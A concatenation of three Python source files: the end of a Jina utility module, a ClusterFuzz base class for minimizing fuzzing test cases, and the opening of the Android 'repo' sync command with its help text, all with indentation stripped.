:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
'pyzmq': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _use_uvloop():
from .importer import ImportExtensions
with ImportExtensions(
required=False,
help_text='Jina uses uvloop to manage events and sockets, '
'it often yields better performance than builtin asyncio',
):
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
if 'JINA_DISABLE_UVLOOP' not in os.environ:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warn::
Set :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using magic command `get_ipython` that only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Clien/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referrenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
minimizer.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes for other minimizers."""
from __future__ import absolute_import
from builtins import object
from builtins import range
from future import standard_library
standard_library.install_aliases()
from metrics import logs
import copy
import functools
import os
import tempfile
import threading
import time
from . import errors
DEFAULT_CLEANUP_INTERVAL = 20
DEFAULT_THREAD_COUNT = 8
DEFAULT_TESTS_PER_THREAD = 4
MAX_MERGE_BATCH_SIZE = 32
PROGRESS_REPORT_INTERVAL = 300
class DummyLock(object):
"""Dummy to replace threading.Lock for single-threaded tests."""
def __enter__(self):
pass
def __exit__(self, exec_type, value, traceback):
pass
def __bool__(self):
return False
class TestQueue(object):
"""Queue to store commands that should be executed to test hypotheses."""
def __init__(self,
thread_count,
deadline_check=None,
progress_report_function=None,
per_thread_cleanup_function=None):
self.thread_count = thread_count
self.deadline_check = deadline_check
self.progress_report_function = progress_report_function
self.per_thread_cleanup_function = per_thread_cleanup_function
self.lock = threading.Lock()
self.queue = []
def _pop(self):
"""Pull a single hypothesis to process from the queue."""
with self.lock:
if not self.queue:
return None
return self.queue.pop(0)
def _work(self):
"""Process items from the queue until it is empty."""
while not self.deadline_check or not self.deadline_check(soft_check=True):
current_item = self._pop()
if not current_item:
break
test, test_function, completion_callback, should_run = current_item # pylint: disable=unpacking-non-sequence
if not should_run():
continue
result = test_function(test)
completion_callback(result)
if self.per_thread_cleanup_function:
self.per_thread_cleanup_function()
# Abort if we have exceeded the deadline for this operation.
if self.deadline_check and self.deadline_check(soft_check=True):
break
def _cleanup(self):
"""Clean up the queue to be sure that no more tasks will be executed."""
with self.lock:
self.queue = []
def push(self,
test,
test_function,
completion_callback,
should_run=lambda: True):
"""Add a test to the queue and a callback to run on completion."""
with self.lock:
self.queue.append((test, test_function, completion_callback, should_run))
def force(self,
test,
test_function,
completion_callback,
should_run=lambda: True):
"""Force a test to the front of the queue."""
entry = (test, test_function, completion_callback, should_run)
with self.lock:
self.queue.insert(0, entry)
def size(self):
"""Return the number of unprocessed tasks in the queue."""
return len(self.queue)
def process(self):
"""Process all tests in the queue and block until completion."""
while self.queue:
threads = [
threading.Thread(target=self._work) for _ in range(self.thread_count)
]
for thread in threads:
thread.start()
while any([thread.is_alive() for thread in threads]):
if self.deadline_check:
self.deadline_check(cleanup_function=self._cleanup)
if self.progress_report_function:
self.progress_report_function()
time.sleep(1)
class Testcase(object):
"""Single test case to be minimized."""
def __init__(self, data, minimizer):
self.minimizer = minimizer
if minimizer.tokenize:
try:
self.tokens = minimizer.tokenizer(data)
except UnicodeDecodeError:
raise errors.AntlrDecodeError
else:
self.tokens = data
self.required_tokens = [True] * len(self.tokens)
self.tested_hypotheses = set()
self.unmerged_failing_hypotheses = []
self.tests_to_queue = []
self.currently_processing = False
self.last_progress_report_time = 0
self.runs_since_last_cleanup = 0
self.runs_executed = 0
if minimizer.max_threads > 1:
self.test_queue = TestQueue(
minimizer.max_threads,
deadline_check=self._deadline_exceeded,
progress_report_function=self._report_progress)
self.merge_preparation_lock = threading.Lock()
self.merge_lock = threading.Lock()
self.cache_lock = threading.Lock()
self.tests_to_queue_lock = threading.Lock()
else:
self.test_queue = None
self.merge_preparation_lock = DummyLock()
self.merge_lock = DummyLock()
self.cache_lock = DummyLock()
self.tests_to_queue_lock = DummyLock()
def get_current_testcase_data(self):
"""Return the current test case data."""
return self.minimizer.token_combiner(self.get_required_tokens())
# Helper functions based on minimizer configuration.
def _deadline_exceeded(self, cleanup_function=None, soft_check=False):
"""Check to see if we have exceeded the deadline for execution."""
if self.minimizer.deadline and time.time() > self.minimizer.deadline:
if soft_check:
return True
# If we are here, we have exceeded the deadline on a hard check. Clean up.
if cleanup_function:
cleanup_function()
if self.minimizer.cleanup_function:
self.minimizer.cleanup_function()
# Raise an exception if this is not a soft deadline check.
raise errors.MinimizationDeadlineExceededError(self)
return False
def _delete_file_if_needed(self, input_file):
"""Deletes a temporary file if necessary."""
# If we are not running in a mode where we need to delete files, do nothing.
if not self.minimizer.tokenize or not self.minimizer.delete_temp_files:
return
try:
os.remove(input_file)
except OSError:
pass
def _report_progress(self, is_final_progress_report=False):
"""Call a function to report progress if the minimizer uses one."""
if not self.minimizer.progress_report_function:
return
if (time.time() - self.last_progress_report_time < PROGRESS_REPORT_INTERVAL
and not is_final_progress_report):
return
self.last_progress_report_time = time.time()
message = '%d/%d tokens remaining. %d runs executed so far.' % (len(
self.get_required_tokens()), len(
self.required_tokens), self.runs_executed)
if is_final_progress_report:
message = "Done with this round of minimization. " + message
self.minimizer.progress_report_function(message)
# Functions used when preparing tests.
def _range_complement(self, current_range):
"""Return required tokens in the complement of the specified range."""
result = list(range(len(self.tokens)))
to_remove = set(current_range)
return [i for i in result if i not in to_remove and self.required_tokens[i]]
def _prepare_test_input(self, tokens, tested_tokens):
"""Write the tokens currently being tested to a temporary file."""
tested_tokens = set(tested_tokens)
current_tokens = [t for i, t in enumerate(tokens) if i in tested_tokens]
if not self.minimizer.tokenize:
return current_tokens
data = self.minimizer.token_combiner(current_tokens)
handle = self.minimizer.get_temp_file()
destination = handle.name
try:
handle.write(data)
except IOError:
# We may have filled the disk. Try processing tests and writing again.
self._do_single_pass_process()
handle.write(data)
handle.close()
return destination
def _get_test_file(self, hypothesis):
"""Return a test file for a hypothesis."""
complement = self._range_complement(hypothesis)
return self._prepare_test_input(self.tokens, complement)
def _push_test_to_queue(self, hypothesis):
"""Add a test for a hypothesis to a queue for processing."""
test_file = self._get_test_file(hypothesis)
callback = functools.partial(
self._handle_completed_test,
hypothesis=hypothesis,
input_file=test_file)
should_run = functools.partial(self._contains_required_tokens, hypothesis,
test_file)
self.test_queue.push(
test_file,
self.minimizer.test_function,
callback,
should_run=should_run)
# Make sure that we do not let too many unprocessed tests build up.
if self.test_queue.size() >= self.minimizer.batch_size:
self._do_single_pass_process()
def prepare_test(self, hypothesis):
"""Prepare the test based on the mode we are running in."""
# Check the cache to make sure we have not tested this before.
if self._has_tested(hypothesis):
return
self.runs_executed += 1
# If we are single-threaded, just run and process results immediately.
if not self.test_queue:
# In the threaded case, we call the cleanup function before each pass
# over the queue. It needs to be tracked here for the single-thread case.
self.runs_since_last_cleanup += 1
if (self.runs_since_last_cleanup >=
self.minimizer.single_thread_cleanup_interval and
self.minimizer.cleanup_function):
self.minimizer.cleanup_function()
test_file = self._get_test_file(hypothesis)
if self._contains_required_tokens(hypothesis, test_file):
self._handle_completed_test(
self.minimizer.test_function(test_file), hypothesis, test_file)
# Check to see if we have exceeded the deadline and report progress.
self._report_progress()
self._deadline_exceeded()
return
if self.currently_processing:
# If we are processing, we cannot write more tests or add to the queue.
with self.tests_to_queue_lock:
self.tests_to_queue.append(hypothesis)
else:
self._push_test_to_queue(hypothesis)
# Functions used when processing test results.
def _handle_completed_test(self, test_passed, hypothesis, input_file):
"""Update state based on the test result and hypothesis."""
# If the test failed, handle the result.
if not test_passed:
self._handle_failing_hypothesis(hypothesis)
# Delete leftover files if necessary.
self._delete_file_if_needed(input_file)
# Minimizers may need to do something with the test result.
self._process_test_result(test_passed, hypothesis)
def _process_test_result(self, test_passed, hypothesis):
"""Additional processing of the result. Minimizers may override this."""
def _handle_failing_hypothesis(self, hypothesis):
"""Update the token list for a failing hypothesis."""
if not self.test_queue:
# We aren't multithreaded, so just update the list directly.
for token in hypothesis:
self.required_tokens[token] = False
return
with self.merge_preparation_lock:
self.unmerged_failing_hypotheses.append(hypothesis)
if len(self.unmerged_failing_hypotheses) < MAX_MERGE_BATCH_SIZE:
return
hypotheses_to_merge = self.unmerged_failing_hypotheses
self.unmerged_failing_hypotheses = []
# We may need to block while the previous batch is merging. If not, the
# results from this batch could conflict with the results from the previous.
with self.merge_lock:
self._attempt_merge(hypotheses_to_merge)
def _attempt_merge(self, hypotheses, sibling_merge_succeeded=False):
"""Update the required token list if the queued changes don't conflict."""
# If there's nothing to merge, we're done.
if not hypotheses:
return
aggregate_tokens = set()
for hypothesis in hypotheses:
for token in hypothesis:
aggregate_tokens.add(token)
aggregate_hypothesis = list(aggregate_tokens)
if sibling_merge_succeeded:
# We were able to remove all tokens from the other half of this
# hypothesis, so we can assume that this would fail without running the
# test. If this would also pass, there would not have been a conflict
# while testing this set. Well, this could be a flaky test, but then we
# have bigger problems.
test_passed = True
else:
complement = self._range_complement(aggregate_hypothesis)
test_file = self._prepare_test_input(self.tokens, complement)
test_passed = self.minimizer.test_function(test_file)
self._delete_file_if_needed(test_file)
# Failed (crashed), so there was no conflict here.
if not test_passed:
for token in aggregate_hypothesis:
self.required_tokens[token] = False
return
# Passed (no crash). We need to try a bit harder to resolve this conflict.
if len(hypotheses) == 1:
# We really cannot remove this token. No additional work to be done.
return
middle = len(hypotheses) // 2
front = hypotheses[:middle]
back = hypotheses[middle:]
# If we could remove either one of two hypotheses, favor removing the first.
# FIXME: Fix this. Tracked in #1845.
# pylint: disable=assignment-from-none
front_merged_successfully = self._attempt_merge(front)
self._attempt_merge(back, sibling_merge_succeeded=front_merged_successfully)
def _do_single_pass_process(self):
"""Process through a single pass of our test queue."""
self.currently_processing = True
self.test_queue.process()
# If a cleanup function is provided, call it. This is usually used to
# ensure that all processes are terminated or perform additional cleanup.
if self.minimizer.cleanup_function:
self.minimizer.cleanup_function()
# Push any results generated while this test was running to the queue.
self.currently_processing = False
while self.tests_to_queue:
with self.tests_to_queue_lock:
hypothesis = self.tests_to_queue.pop(0)
# This may trigger another round of processing, so don't hold the lock.
self._push_test_to_queue(hypothesis)
def process(self):
"""Start a test."""
if not self.test_queue:
return
while self.test_queue.size():
self._do_single_pass_process()
with self.merge_preparation_lock:
hypotheses_to_merge = self.unmerged_failing_hypotheses
self.unmerged_failing_hypotheses = []
with self.merge_lock:
self._attempt_merge(hypotheses_to_merge)
# Cache functions.
def _contains_required_tokens(self, hypothesis, test_file):
"""Check to see if this hypothesis contains untested tokens."""
# It is possible that we could copy this while it is being updated. We do
# not block in this case because the worst case scenario is that we run an
# irrelevant test, and blocking is potentially expensive.
working_required_tokens = copy.copy(self.required_tokens)
with self.merge_preparation_lock:
# A deep copy is not required. Hypotheses are not modified after being
# added to the list for processing.
unprocessed_hypotheses = copy.copy(self.unmerged_failing_hypotheses)
for unprocessed_hypothesis in unprocessed_hypotheses:
for token in unprocessed_hypothesis:
# For this check, we do not care if the merge would succeed or not since
# the best case is that we would add the token to the queue as well.
working_required_tokens[token] = False
for token in hypothesis:
if working_required_tokens[token]:
return True
# If we aren't going to run this test, this will not have a completion
# callback. If that happens, we need to clean up now.
self._delete_file_if_needed(test_file)
return False
def _has_tested(self, hypothesis):
"""Check to see if this hypothesis has been tested before."""
hypothesis_tuple = tuple(hypothesis)
with self.cache_lock:
if hypothesis_tuple in self.tested_hypotheses:
return True
self.tested_hypotheses.add(hypothesis_tuple)
return False
# Result checking functions.
def get_result(self):
"""Get the result of minimization."""
# Done with minimization, output log one more time
self._report_progress(is_final_progress_report=True)
if not self.minimizer.tokenize:
return self.get_required_tokens()
return self.get_current_testcase_data()
def get_required_tokens(self):
"""Return all required tokens for this test case."""
return [t for i, t in enumerate(self.tokens) if self.required_tokens[i]]
def get_required_token_indices(self):
"""Get the indices of all remaining required tokens."""
return [i for i, v in enumerate(self.required_tokens) if v]
def _default_tokenizer(s):
"""Default string tokenizer which splits on newlines."""
return s.split(b'\n')
def _default_combiner(tokens):
"""Default token combiner which assumes each token is a line."""
return b'\n'.join(tokens)
class Minimizer(object):
"""Base class for minimizers."""
def __init__(self,
test_function,
max_threads=1,
tokenizer=_default_tokenizer,
token_combiner=_default_combiner,
tokenize=True,
cleanup_function=None,
single_thread_cleanup_interval=DEFAULT_CLEANUP_INTERVAL,
deadline=None,
get_temp_file=None,
delete_temp_files=True,
batch_size=None,
progress_report_function=None,
file_extension=''):
"""Initialize a minimizer. A minimizer object can be used multiple times."""
self.test_function = test_function
self.max_threads = max_threads
self.tokenizer = tokenizer
self.token_combiner = token_combiner
self.tokenize = tokenize
self.cleanup_function = cleanup_function
self.single_thread_cleanup_interval = single_thread_cleanup_interval
self.deadline = deadline
self.get_temp_file = get_temp_file
self.delete_temp_files = delete_temp_files
self.progress_report_function = progress_report_function
if batch_size:
self.batch_size = batch_size
else:
self.batch_size = DEFAULT_TESTS_PER_THREAD * max_threads
if not get_temp_file:
self.get_temp_file = functools.partial(
tempfile.NamedTemporaryFile,
mode='wb',
delete=False,
prefix='min_',
suffix=file_extension)
else:
self.get_temp_file = get_temp_file
@staticmethod
def _handle_constructor_argument(key, kwargs, default=None):
"""Cleanup a keyword argument specific to a subclass and get the value."""
result = default
try:
result = kwargs[key]
del kwargs[key]
except KeyError:
pass
return result
def _execute(self, data):
"""Perform minimization on a test case."""
raise NotImplementedError
def minimize(self, data):
"""Wrapper to perform common tasks and call |_execute|."""
try:
testcase = self._execute(data)
except errors.MinimizationDeadlineExceededError as error:
# When a MinimizationDeadlineExceededError is raised, the partially
# minimized test case is stored with it so that we can recover the work
# that had been done up to that point.
testcase = error.testcase
except errors.TokenizationFailureError:
logs.log('Tokenized data did not match original data. Defaulting to line'
'minimization.')
# In situation where the tokenizer does not work, we still want to use
# the token combiner. This will not change the data unless
# token combiner changes the data such as appending extra data to the
# start or end. If this is the case, that change will be expected
# in the return.
return self.token_combiner([data])
return testcase.get_result()
def validate_tokenizer(self, data, testcase):
"""Validate that the tokenizer correctly tokenized the data. This is
necessary because if the tokenizer does not recognize a character, it will
skip it."""
# If data is a list, it means we're not minimizing a test case but another
# feature such as files or command line arguments. In these cases, we don't
# rely on a tokenizer.
if isinstance(data, list):
return True
# For most token_combiners, using the combiner on data like below will do
# nothing, but in situations where data is changed in the token combiner
# such as data being appended to the start or end of data we want to make
# sure the same change happens to both before comparison.
data = self.token_combiner([data])
return testcase.get_current_testcase_data() == data
@staticmethod
def run(data, thread_count=DEFAULT_THREAD_COUNT, file_extension=''):
"""Minimize |data| using this minimizer's default configuration."""
raise NotImplementedError
|
sync.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import netrc
from optparse import SUPPRESS_HELP
import os
import pickle
import re
import shutil
import socket
import subprocess
import sys
import time
from pyversion import is_python3
if is_python3():
import urllib.parse
import xmlrpc.client
else:
import imp
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.parse = urlparse
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
from git_command import GIT, git_require
from git_refs import R_HEADS, HEAD
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
The -f/--force-broken option can be used to proceed with syncing
other projects if a project sync fails.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
SSH Connections
---------------
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
